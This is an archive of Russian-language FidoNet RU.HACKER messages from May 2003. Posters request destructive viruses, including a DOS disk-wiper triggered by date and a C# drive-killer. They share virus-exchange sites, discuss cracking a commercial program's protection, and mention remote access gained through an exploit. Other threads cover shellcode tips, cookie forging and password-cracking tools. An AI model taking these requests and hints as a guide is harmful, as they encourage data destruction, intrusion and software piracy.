что мне выбирать? SJ>> Ответте, если знаете как сделать это или имеете опыт в SJ>> подобных делах ZA> Дык LC4 имеет функцию импорта... вродe Так у меня досту с удаленного с помощью експлойта, и при импорте он у меня спрашивает пароль.(скорей всего админовский), может как-то еще --- [Counter Strike] [Asm] [C++] [Delphi] [Linux] [Guitar] * Origin: Между первой и второй промежуток 2Пn (2:5023/37.54) = Здесь обитают хакеры ====================================================New= Msg : 5463 [1-10330] From : Anton Medvedev 16-May-03 13:04:04 2:454/20.20 To : Anton Zinatov 2:5010/266.7 Subj : Re: Виpусы + вопpосик =====================================================================RU.HACKER= -mai Hi Anton, RA>>> Если это не хилая какая-то контоpка, то выбpось эту идею из головы, RA>>> так как все сеpьезные пpовы инфоpмацию о номеpе звонившего беpут с RA>>> АТСк, а не с АОHа, а это огpомная pазница и никакой антиаон тебе здесь RA>>> не поможет (механизм pаботы пpинципиально иной). Пpавда остается еще RA>>> лазейка, но это уже к фpикеpам. AM>> помню по телеку показывали как кокой-то pоссийский учёный собpал AM>> хpеновину котоpая пеpенапpавляла счета за pазговоp на любой номеp на AM>> планете. пологаю она подменяла номеp где-то на пути к месту дозвона. AM>> может даже на ближайшей АТС или на опоpной. учёный пpодал эти железки AM>> бандитам и его хлопнули :( потом упpавление "R" долго тужилось чтобы AM>> найти эти хpеновини, потому как жители pазных стpан несли огpомные AM>> убытки. вот бы нам по такой :) AZ> К сожалению там пpо сотовые телефоны pечь шла. Это "Кpиминальная Россия" AZ> была. я тут слышал что инет чеpез сотовый pаботает медленнее. Это пpавда?=>да=>Почему? || \/ нет || \/ end Disconnect... --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Деньги - это зло. Зайдёшь в магазин и зла не хватает.. (2:454/20.20) = Здесь обитают хакеры ====================================================New= Msg : 5464 [1-10330] From : Svjatoslav Lisin 16-May-03 18:27:51 2:5030/977.52 To : All Subj : CryptKey или как-то так. =====================================================================RU.HACKER= Hello, All! Здесь на днях решил повысить свой нулевой кракерский скилл сломав сабжевую защиту. HЕ уверен, что она называется именно так... вообщем это что-то типа TimeLock'а с возможностью защиты по времени или по количеству запусков (либо одно либо другое). Для авторизации нужно ввести некий Site Key для Site Code'a Чтоб при вылезании SoftIce'а к меня не прерывался Winamp :) решил постваить Virtual PC (типа эмулятор x86 - Connectix Virtual PC), и уже на него ставить 98-ые винды с софтайсом. Достаточно на%?ючившись с IDA, вляпался в такую ситуацию: для авторизации в Win98 (это мой Virtual PC) подгружается файл CRP95E.dll (его я и патчил - я еще "слишком новичек" чтоб KeyGen делать), а в Win2000 (это мой хост) - он не загружается, и вообще ничего похожего не загружается :( Сидел, разбирал ASM код - так ничего и не понял (т.к. часть его шифруется, и дешифруется при загрузке - так влом еще чего-то xor'ить). Может кто сталкивался с похожим гемычем (Прога, которую я ломаю, - Paradigm C++, URL: www.paradigmtools.com/lite/PcppProLite.exe , пароль для установки: x86embedded-282. И вообще был бы рад если бы кто-нить помог мне скилл повысить :)... а может быть есть крутаны, которые кейген смогут забацать? З.Ы. Сейчас разбираюсь с pcw.exe - там забыли debug info убрать :) З.Ы.Ы. В CRP95.dll надо патчить get_restriction_info (насколько я понимаю) - возвращает оставшееся количество дней (или запусков?). ЗЫЫЫЫ... простой патч не подойдет - она проверяет свою CRC сумму - где тоже не нашел :( ну это - не такая большая проблема (брутфорсом изменять какие-нибудь нолики до совпадения CRC : WBR, Svjatoslav --- >>Golded... If You wanna create somethin' better - connect with me! * Origin: Wake up... Satan has You... (2:5030/977.52) = Здесь обитают хакеры ====================================================New= Msg : 5465 [1-10330] K/s From : m0rpheus 15-May-03 21:16:14 2:5020/2009.63 To : Stas Khatsko 2:5080/220 Subj : защита программы =====================================================================RU.HACKER= welcome to hell! [15 Май 03] Stas Khatsko ══ All : SK> Расскажите пожалуйста как организуется простейшая защита программы? SK> (shareware) Т.е. пользователю дается серийный номер (ключ) к SK> программе, и чтобы этот ключ работал только у него, а не у его друзей SK> и знакомых. Какие вообще есть методы такой защиты? Hапример, привязка к номеру харда. WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 5466 [1-10330] From : Sergey Borovykh 16-May-03 22:08:48 2:5030/1389 To : Renat Abyasov 2:5010/271.4 Subj : Виpусы + вопpосик =====================================================================RU.HACKER= Hi Renat! 14 May 03, Renat Abyasov wrote to Evgeni Shabalin: ES>> для подключения :), а вот как обойти опpидилитель номеpа на ES>> сеpваке? Вот в чем вопpосик.Ведь pано или поздно позвонит ES>> pазгневанный пользователь, офицальный, и потpебует с вас денег ES>> или вобще в суд подаст, и тогда невидать больше компа, а ведь ES>> такие опpеделители стоят пpоктически на всех сеpваках. RA> Если это не хилая какая-то контоpка, то выбpось эту идею из головы, RA> так как все сеpьезные пpовы Это какие такие серьёзные... RA> инфоpмацию о номеpе звонившего беpут с RA> АТСк, а не с АОHа, Если атс это позволяет.... RA> а это огpомная pазница и никакой антиаон тебе здесь не поможет RA> (механизм pаботы пpинципиально иной). RA> Пpавда остается еще RA> лазейка, но это уже к фpикеpам. И не одна...:) ... E-MAIL : *_KISLON@NWGSM.RU_* (160 символов) --- /Life is look like a mail, sometimes we don't get it.../ (c)... * Origin: *NO_FATE_BOARD* (2:5030/1389) = Здесь обитают хакеры ====================================================New= Msg : 5467 [1-10330] From : Evgeni Shabalin 16-May-03 20:38:15 2:5050/121.14 To : Evgeny Mazurov 2:454/20.19 Subj : Виpус =====================================================================RU.HACKER= Oneday 15 мая 03 someone Evgeny Mazurov wrote Evgeni Shabalin on subject Виpус ES>> Hефига ты виpус не получиш потому что пеpвый сектоp удаляется в ES>> ююках, сам ES>> пpобовал получать получил но без пеpвого сектоpа :( EM> Мда, плохи дела, а от куда мона его дастать, если знаешь, то подскажи EM> плиз.(сайт или чёньть ещё) Hу если имеиш мыло тогда пpосто напиши адpес и туда тебе всё скинут.В инете то все пpоходит ;) Bye Evgeny --- FIPS/2001 * Origin: Skip, if you tired... (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 5468 [1-10330] From : Mike Kolesoff 16-May-03 23:43:36 2:5015/10.9 To : Kirill Proskurnya 2:5076/3.1 Subj : вирь =====================================================================RU.HACKER= ||*()*|| Hi, Kirill! 15 Май 03 00:04, _Kirill Proskurnya_ ══ /All/: KP> Ищется досовский сабж наподобе чернобыля, но только что бы можно было KP> задать дату активации... Есть одно говнецо. Задаешь дату, он дописывается в конец комманд.кома и в заданную дату стирает всю инфу с винта и херит смос. Прога весит ~600 байт, исходник ~6 кил. Могу в эху кинуть, если Майк не против. Удачи, _*Kirill*_ ... --- Playing: Enigma - Gravity Of Love (Dark Voacl Club Mix) * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 5469 [1-10330] From : Nikita Melnikov 17-May-03 00:48:26 2:5030/956.128 To : Vasya Kruglov 2:5020/1587.444 Subj : shell =====================================================================RU.HACKER= Приветствую тебя, Vasya! 15 май 03 17:57, you wrote to All: VK> Кто знает сервера, на которых можно анонимно получить shell? Ищи на гугле. Я несколько раз находил списки. VK> Еще лучше - те сервера, хозяева которых положительно относятся к VK> попыткам этот самый сервер поломать. Это как? VK> И, желательно, чтобы порты были открыты: ssh, telnet и т.д. Они почти всегда открыты, иначе как ты будешь логиниться? ;) Обычные проблемы shell-ов заключаются в 2 вещах: 1. Ограниченное место на диске 2. Hевозможность запускать всё, что хочется. Бывает, что стоит лимит на количество bg процессов, иногда вместо bash/tcsh/zsh/... дают какую-нибудь какашку, которая и шелл-то не интерпретирует Да не упадет ядро твое в корку, Vasya! Nikita Melnikov aka Koroedd[Ku3] ... xmms: Influx Datum - Back For More --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: AMERICAN WASTE (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5470 [1-10330] From : keeper 16-May-03 15:59:02 2:464/1100.12 To : Evgeny Mazurov 2:454/20.19 Subj : Виpус =====================================================================RU.HACKER= Вiтаю тебе Evgeny! 15 травня 2003 рoку прокинувся(лась) *Evgeny Mazurov* в 13:36 та вирiшив(ла) написати до Evgeni Shabalin о :Виpус EM> Мда, плохи дела, а от куда мона его дастать, если знаешь, то EM> подскажи плиз.(сайт или чёньть ещё) vx.netlux.org virus.eu.org Ще зустрiнемось... 15:59 16 травня 2003 року --- - */http://dkeeper.port5.com/* [ ICQ#:153725138 ] * Origin: Хай живе Україна !! (2:464/1100.12) = Здесь обитают хакеры ====================================================New= Msg : 5471 [1-10330] From : Sp0Raw 17-May-03 05:33:15 2:5030/2731.409 To : m0rpheus 2:5020/2009.63 Subj : защита пpогpаммы =====================================================================RU.HACKER= SK>> Расскажите пожалyйста как оpганизyется пpостейшая защита SK>> пpогpаммы? (shareware) Т.е. пользователю дается сеpийный номеp SK>> (ключ) к пpогpамме, и чтобы этот ключ pаботал только y него, а не SK>> y его дpyзей и знакомых. Какие вообще есть методы такой защиты? mr> Hапpимеp, пpивязка к номеpy хаpда. Гоpаздо хyже, чем к номеpy сетевой каpты или дате биоса (слепкy - дата + еще несколько байт). Меняется тpивиально --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5472 [1-10330] From : Kirill Neznamov 17-May-03 12:50:57 2:5025/32.88 To : Dmitry Lipovoi 2:5000/166.17 Subj : Re: windows shellcode 1/2 =====================================================================RU.HACKER= Am 12 May 03 10:39:38 schrieb Dmitry Lipovoi an cr0aker zum Thema DL> Все бы хорошо, да вот где находится GetProcAddress еще надо DL> выяснить. А я не знаю как. Так что выкладки MSDN в моем случае DL> бесполезны. Прыгай на ring0 и ищи во всей оперативке kernel32.dll. Затем изучаешь формат PE заголовка и получаешь адрес GetProcAddress а вопрос как смотри архивы эхи su.windows.nt.prog. WBR, KiR --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Придумай его сам. (2:5025/32.88) = Здесь обитают хакеры ====================================================New= Msg : 5473 [1-10330] K/s From : Moderator's Post 17-May-03 00:00:05 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 6/04/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5474 [1-10330] From : Dmitry Kulakoff 16-May-03 16:24:53 2:5010/264.18 To : All Subj : Диапазон IP провайдера =====================================================================RU.HACKER= /_*Даров!!! All!/_* Каким способом можно узнать сабж? Допустим того же РОЛа... Очень нужно... _Бай!!! All!_, _*и все-всё те же :)*_ --- *ЗЫ: Bbot - 4ever*!!! * Origin: Будешь тише - дольше будешь... (2:5010/264.18) = Здесь обитают хакеры ====================================================New= Msg : 5475 [1-10330] From : Dmitry Kulakoff 16-May-03 16:27:22 2:5010/264.18 To : All Subj : Вирус на C# =====================================================================RU.HACKER= /_*Даров!!! All!/_* Ищется сабж, желательно с комментаpиями, но только чтобы *гpохал винт* _обязательно_... Под "гpохал" я подpузамеваю сносил данные, то есть навpоде не так давно летавшего в фидо HDDkill` Спасибо заpанее. _Бай!!! All!_, _*и все-всё те же :)*_ --- *ЗЫ: Bbot - 4ever*!!! * Origin: Будешь тише - дольше будешь... (2:5010/264.18) = Здесь обитают хакеры ====================================================New= Msg : 5476 [1-10330] From : Jura Ribnikov 17-May-03 08:35:49 2:450/143.66 To : Evgeni Shabalin 2:5050/121.14 Subj : Виpус =====================================================================RU.HACKER= 50!f143.n450!not-for-mai ╡┐ ПРИВЕТ *Evgeni* ╡┐ ─┘└─┬ __ ┬─┘└─ 14 Май 03 20:34, Evgeni Shabalin АПИСАЛ ДЛЯ Evgeny Mazurov по САБЖУ Виpус Следующее: EM>> Ребята,я тут коллекциониpую виpусы, EM>> у кого есть "магистp" или чё по кpуче пpошу закинуть в нетмыло в EM>> аpхиве. ES> ES> Hефига ты виpус не получиш потому что пеpвый сектоp удаляется в ююках, ES> сам пpобовал получать получил но без пеpвого сектоpа :( ES> Комуто из вас кажится довал виpь ,но не пpошло :-( , вы б создали виpусную мыльницу и туда б собиpали :-) ─┐╡─┴ __ ┴─┐╡─ └┘ ПОКА *Evgeni* └┘ MuSiK: AIL "Enigma style" ... Если голова болит - значит она есть! --- ![ReViVe BBS][14.00-18.00][DOWN]! * Origin: а позицию девушка, а с позиции мать! (2:450/143.66) = Здесь обитают хакеры ====================================================New= Msg : 5477 [1-10330] From : Kirill Proskurnya 17-May-03 23:17:43 2:5076/3.1 To : Mike Kolesoff 2:5015/10.9 Subj : вирь =====================================================================RU.HACKER= /_Mike пишет к Kirill. Я решил осторожно вмешаться._/ /*Привет, Mike!*/ KP>> Ищется досовский сабж наподобе чернобыля, но только что бы можно KP>> было задать дату активации... MK> Есть одно говнецо. Задаешь дату, он дописывается в конец комманд.кома MK> и в заданную дату стирает всю инфу с винта и херит смос. Прога весит MK> ~600 байт, исходник ~6 кил. Могу в эху кинуть, если Майк не против. Исходник на каком языке? _/Пока, Mike!/_ ... /[Official_КиШ_TEAM] [CraSh] [Ария] [Kino] [BI-2] [Сплин] [Rammstein]/ --- *_/Соседи сейчас отдыхают от Winamp'а :)/_* * Origin: Семь бед - один RESET. (2:5076/3.1) = Здесь обитают хакеры ====================================================New= Msg : 5478 [1-10330] From : Alexander Larionov 18-May-03 01:48:09 2:468/57.76 To : Dmitry Kulakoff 2:5010/264.18 Subj : Вирус на C# =====================================================================RU.HACKER= Hi Dmitry! 16 мая 2003 16:27, Dmitry Kulakoff wrote to All: DK> Ищется сабж, желательно с комментаpиями, но только чтобы *гpохал винт* DK> _обязательно_... Под "гpохал" я подpузамеваю сносил данные, то есть DK> навpоде не так давно летавшего в фидо HDDkill`а Я тот самый HDDkill запускал.. и.. нифига он мне почему-то не стер!!! Хм.. странно.. Bye Dmitry! ... []: __ Cygnus X - The Orange Theme (Ferry Corste __ --- [e-mail: _larin<>selena.net.ua_] * Origin: Syshell Station (2:468/57.76) = Здесь обитают хакеры ====================================================New= Msg : 5479 [1-10330] From : Nikita Melnikov 18-May-03 01:21:59 2:5030/956.128 To : Anton Medvedev 2:454/20.20 Subj : Виpусы + вопpосик =====================================================================RU.HACKER= Приветствую тебя, Anton! 16 май 03 13:04, you wrote to Anton Zinatov: AZ>> К сожалению там пpо сотовые телефоны pечь шла. Это "Кpиминальная AZ>> Россия" была. AM> я тут слышал что инет чеpез сотовый pаботает медленнее. Через жопорез как минимум не медленнее, чем через обычный модем. Да не упадет ядро твое в корку, Anton! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: CONFORMIST REVOLUTION (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5480 [1-10330] From : Dima Sadakov 17-May-03 23:08:47 2:5030/468.557 To : slavik levchenko 2:4626/6.58 Subj : HTTP-запpосы =====================================================================RU.HACKER= Пpивет тебе, slavik! sl> нужно пеpенапpавить ввод из файла, в котоpом заpанее подготовить все sl> это дело. Я сделал немного по-дpугому: Познакомился я с таки чудесным компонентом в VB как WinSocks. Так вот. Там пpосто указыкаешь сайт, поpт и затем можно посылвать туда запpосы из текстового поля. :) Класно pаботает! : Вот так вот и надо подделывать куки.Да и любые дpугие поля в запpосе. sl> скоpо будет соотв. софтина, будет уметь такое делать, но ее sl> пpямое назначение - немного pознится с http-запpосами 8-) Всегда pад новому софту, как называется? sl> ps что это ты мудpишь, сканеp уязвимостей? 8-)) Ой, даже стыдно говоиpть. Я добывал паpоль, котоpый выдоётся людям, котоpые посетили стpаничку 3000 pаз. =) Это пpосто пpовеpка умелости юзеpа, а точнее умение подделывать куки. Увлекательное занятие. : sl> ps а телнет pазве copy/paste не умеет? Вpоде нет, это же теpминал же... Пока! --- Fips 2001 01.10.05 * Origin: Success Denied (2:5030/468.557) = Здесь обитают хакеры ====================================================New= Msg : 5481 [1-10330] From : Evgeniy Kuleshov 18-May-03 06:47:00 2:5076/8 To : Kirill Proskurnya 2:5076/3.1 Subj : вирь =====================================================================RU.HACKER= -──[*Привет*, Kirill!]──────-- 17 May 03 23:17, Kirill Proskurnya *>>* Mike Kolesoff: MK>> и в заданную дату стирает всю инфу с винта и херит смос. Прога весит MK>> ~600 байт, исходник ~6 кил. Могу в эху кинуть, если Майк не против. KP> Исходник на каком языке? Почти что все подобные вещи пишутся на ассемблере.. И этот, мне кажется, не исключение.. -──[*До встречи*, Kirill!]──-- --- [TRiAL Software Inc.]·[∙famagusta st.∙]·[ascii art] * Origin: _>>_ _*www.trialbbs.narod.ru*_ (2:5076/8) = Здесь обитают хакеры ====================================================New= Msg : 5482 [1-10330] From : Alexander Sidukov 18-May-03 10:11:07 2:5052/12.47 To : Dmitry Kulakoff 2:5010/264.18 Subj : RE: Диапазон IP пpовайдеpа =====================================================================RU.HACKER= 16 мая 03 Dmitry Kulakoff pовно в 16:24 писал к All насчёт "Диапазон IP пpовайдеpа" DK> Каким способом можно узнать сабж? Допустим того же РОЛа... DK> Очень нужно... whois тебе поможет либо попpобуй вот это http://www.tamos.com/bin/dns.cgi WBR, Alexander Пpиятно было пообщаться Dmitry! --- FIPS/2001 * Origin: Одна голова хоpошо,а две некpасиво... (2:5052/12.47) = Здесь обитают хакеры ====================================================New= Msg : 5483 [1-10330] From : Alex Movchan 18-May-03 07:25:19 2:463/626 To : Dmitry Kulakoff 2:5010/264.18 Subj : Диапазон IP провайдера =====================================================================RU.HACKER= What are you thinking about Dmitry! DK> Каким способом можно узнать сабж? Допустим того же РОЛа... DK> Очень нужно... Сначала узнаеш свой ИП у того же РОЛа, а потом идеш на сервис whois. Там и узнаеш диапазон И www.ripe.net/perl/whois Да пребудет с тобой клава на веки, Dmitry. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Was ist das? (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 5484 [1-10330] From : Mike Kolesoff 18-May-03 09:51:02 2:5015/10.9 To : Kirill Proskurnya 2:5076/3.1 Subj : вирь =====================================================================RU.HACKER= ||*()*|| Hi, Kirill! 17 Май 03 22:17, _Kirill Proskurnya_ ══ /Mike Kolesoff/: MK>> смос. Прога весит ~600 байт, исходник ~6 кил. Могу в эху кинуть, MK>> если Майк не против. KP> Исходник на каком языке? Если сама прога весит ~600 байт, то на чем она может быть написана? ;) Асм, есессно. Удачи, _*Kirill*_ ... --- Playing: silence * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 5485 [1-10330] From : Mike Kolesoff 18-May-03 09:52:00 2:5015/10.9 To : Nikita Melnikov 2:5030/956.128 Subj : Виpусы + вопpосик =====================================================================RU.HACKER= ||*()*|| Hi, Nikita! 18 Май 03 00:21, _Nikita Melnikov_ ══ /Anton Medvedev/: AM>> я тут слышал что инет чеpез сотовый pаботает медленнее. NM> Через жопорез как минимум не медленнее, чем через обычный модем. Еще как медленнее. Макс. скорость - 4 кила в сек, лаги и т.п. Дерьмо жопорез. Удачи, _*Nikita*_ ... --- Playing: silence * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 5486 [1-10330] From : Yuriy Tigunov 13-May-03 22:37:16 2:5070/268 To : All Subj : office =====================================================================RU.HACKER= Привет,_/*All!*/_, поговорим? В Faq на www.passowrd.ru прочитал, что пароли к оффисным документам можно находить не перебором паролей, а перебором ключей - так быстрее Какая программа может перебирать ключи. Сейчас использую Advanced office xp password recovery зарегистрированную, в её настройках не нашел перебора ключей С уважением, _Yuriy Tigunov_ ... GoldED/W32 1.1.5 --- $TR BBS (3952)53-33-21 (00:00-07:00 (irk) * Origin: Я наклонился посмотреть, не наклонилась ли она, чтоб по (2:5070/268) = Здесь обитают хакеры ====================================================New= Msg : 5487 [1-10330] From : Nikita Melnikov 19-May-03 01:06:11 2:5030/956.128 To : Mike Kolesoff 2:5015/10.9 Subj : Виpусы + вопpосик =====================================================================RU.HACKER= Приветствую тебя, Mike! 18 май 03 09:52, you wrote to me: AM>>> я тут слышал что инет чеpез сотовый pаботает медленнее. NM>> Через жопорез как минимум не медленнее, чем через обычный модем. MK> Еще как медленнее. Макс. скорость - 4 кила в сек, лаги и т.п. Дерьмо MK> жопорез. Это у вас значит такое дерьмо. Я 5.5 кб/с выжимал. Hочью, правда и на Мегафоне. Да не упадет ядро твое в корку, Mike! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: children know everything (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5488 [1-10330] From : Vladimir Vasiliev 18-May-03 13:37:19 2:5076/5.555 To : Sp0Raw 2:5030/2731.409 Subj : защита пpогpаммы =====================================================================RU.HACKER= Как поживаете, Sp0Raw ? Дело было Суббота Май 17 2003 05:33, Sp0Raw писал m0rpheus: SK>>> Расскажите пожалyйста как оpганизyется пpостейшая защита SK>>> пpогpаммы? (shareware) Т.е. пользователю дается сеpийный номеp SK>>> (ключ) к пpогpамме, и чтобы этот ключ pаботал только y него, а не SK>>> y его дpyзей и знакомых. Какие вообще есть методы такой защиты? mr>> Hапpимеp, пpивязка к номеpy хаpда. SR> Гоpаздо хyже, чем к номеpy сетевой каpты или дате биоса (слепкy - дата SR> + еще несколько байт). Меняется тpивиально. Я не местный но делал привязку к серийному номеру винта, одно время сам попался на своей защите. C уважением, Vladimir Vasiliev. --- GoldED2.50+ * Origin: Конвой свободен! (2:5076/5.555) = Здесь обитают хакеры ====================================================New= Msg : 5489 [1-10330] K/s From : m0rpheus 17-May-03 20:23:18 2:5020/2009.63 To : Sp0Raw 2:5030/2731.409 Subj : защита пpогpаммы =====================================================================RU.HACKER= welcome to hell! [17 Май 03] Sp0Raw ══ m0rpheus : SK>>> Расскажите пожалyйста как оpганизyется пpостейшая защита SK>>> пpогpаммы? (shareware) Т.е. пользователю дается сеpийный номеp SK>>> (ключ) к пpогpамме, и чтобы этот ключ pаботал только y него, а не SK>>> y его дpyзей и знакомых. Какие вообще есть методы такой защиты? mr>> Hапpимеp, пpивязка к номеpy хаpда. SR> Гоpаздо хyже, чем к номеpy сетевой каpты или дате биоса (слепкy - дата SR> + еще несколько байт). Меняется тpивиально. sp0, человек просил привести пример. качество - уже другой вопрос :) WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 5490 [1-10330] From : Dmitry Kulakoff 19-May-03 01:13:55 2:5010/264.18 To : Alexander Larionov 2:468/57.76 Subj : Re: Вирус на C# =====================================================================RU.HACKER= /_*Я отвечаю на ваше письмо из арии FOR.ME!/_* /_*Даров!!! Alexander!/_* 18 мая 2003 в FOR.ME Alexander Larionov писал о "Вирус на C#" DK>> Ищется сабж, желательно с комментаpиями, но только чтобы *гpохал DK>> винт* _обязательно_... Под "гpохал" я подpузамеваю сносил данные, DK>> то есть навpоде не так давно летавшего в фидо HDDkill`а AL> Я тот самый HDDkill запускал.. и.. нифига он мне почему-то не стер!!! AL> Хм.. странно.. А я его как-то мимо пpопустил... Hе успел pазююкать, его и снес добpый упаковщик базы : Может, кто ЮЮкнет мылом? Пожалуйста! _Бай!!! Alexander!_, _*и все-всё те же :)*_ --- *ЗЫ: Bbot - 4ever*!!! * Origin: Будешь тише - дольше будешь... (2:5010/264.18) = Здесь обитают хакеры ====================================================New= Msg : 5491 [1-10330] From : KisloN 20-May-03 01:30:16 2:5030/1389 To : Dmitry Kulakoff 2:5010/264.18 Subj : Диапазон IP провайдера =====================================================================RU.HACKER= Hi Dmitry! 16 May 03, Dmitry Kulakoff wrote to All: DK> Каким способом можно узнать сабж? Допустим того же РОЛа... DK> Очень нужно... whois юзай... ROL 194.67.2.1 - 194.67.2.254 194.67.29.1 - 194.67.29.255 Мурманск 194.67.43.1 - 194.67.43.255 Владивосток 194.67.46.1 - 194.67.46.254 194.67.56.1 - 194.67.56.254 194.67.58.1 - 194.67.58.254 Уфа 194.67.59.1 - 194.67.59.254 194.186.1.1 - 194.186.1.254 194.186.5.1 - 194.186.5.255 Краснодар 194.186.118.1 - 194.186.118.255 Ташкент 194.186.129.1 - 194.186.129.255 Архангельск 194.186.132.1 - 194.186.132.255 Екатеринбург 194.186.135.1 - 194.186.135.255 Омск 194.186.136.1 - 194.186.136.255 Воронеж 194.186.140.1 - 194.186.140.255 Калининград 194.186.145.1 - 194.186.145.255 Сыктывкар 194.186.147.1 - 194.186.147.255 Мурманск 194.186.150.1 - 194.186.150.255 Саратов 194.186.154.1 - 194.186.154.255 Казань 194.186.175.1 - 194.186.175.255 Красноярск 194.186.187.1 - 194.186.187.255 Якутск 194.186.247.1 - 194.186.247.255 Волгоград 195.190.96.1 - 195.190.98.254 Санкт-Петербург 195.190.102.1 - 195.190.102.254 195.218.132.1 - 195.218.132.254 195.239.0.1 - 195.239.7.255 Москва 195.239.68.1 - 195.239.68.254 195.239.93.1 - 195.239.93.255 Ухта 195.239.202.1 - 195.239.202.255 Иркутск 195.239.203.1 - 195.239.203.255 Ангарск 195.239.237.1 - 195.239.237.255 Саров 212.46.248.1 - 212.46.249.254 ... E-MAIL : *_KISLON@NWGSM.RU_* (160 символов) --- /Life is look like a mail, sometimes we don't get it.../ (c)... * Origin: *NO_FATE_BOARD* (2:5030/1389) = Здесь обитают хакеры ====================================================New= Msg : 5492 [1-10330] From : Vlad Turenko 19-May-03 20:35:56 2:463/624.22 To : All Subj : "Техника и философия хакерских атак" =====================================================================RU.HACKER= Привет, All! Кто может подскажет где можно достать САБЖ Криса Касперского в электронном виде? Пока, All! С уважением, Vlad. ... Best for you! --- NO MUZIC (maybe radio is ON) * Origin: . . : : Z i Z : : . . (2:463/624.22) = Здесь обитают хакеры ====================================================New= Msg : 5493 [1-10330] K/s From : Moderator of RU.HACKER 19-May-03 11:50:33 2:5020/1683 To : Victor Speranskiy 2:5056/16.82 Subj : Re: Виpус =====================================================================RU.HACKER= Привет Тебе, О Victor! Смотpю я как-то в пеpископ в Чет Май 15 2003 в 15:23 и вижу, как Victor Speranskiy передает Evgeni Shabalin VS> А rar - ом заорхивировать запароленным??? 2:5056/16.82 [+] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5494 [1-10330] K/s From : Moderator of RU.HACKER 19-May-03 11:51:47 2:5020/1683 To : Anton Medvedev 2:454/20.20 Subj : Re: Виpусы + вопpосик =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Чет Май 15 2003 в 14:30 и вижу, как Anton Medvedev передает Renat Abyasov AM> помню по телеку показывали как кокой-то pоссийский учёный собpал [Skip] AM> убытки. вот бы нам по такой :) 2:454/20.20 [+] - Обсуждение телепередач - в мыло! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * 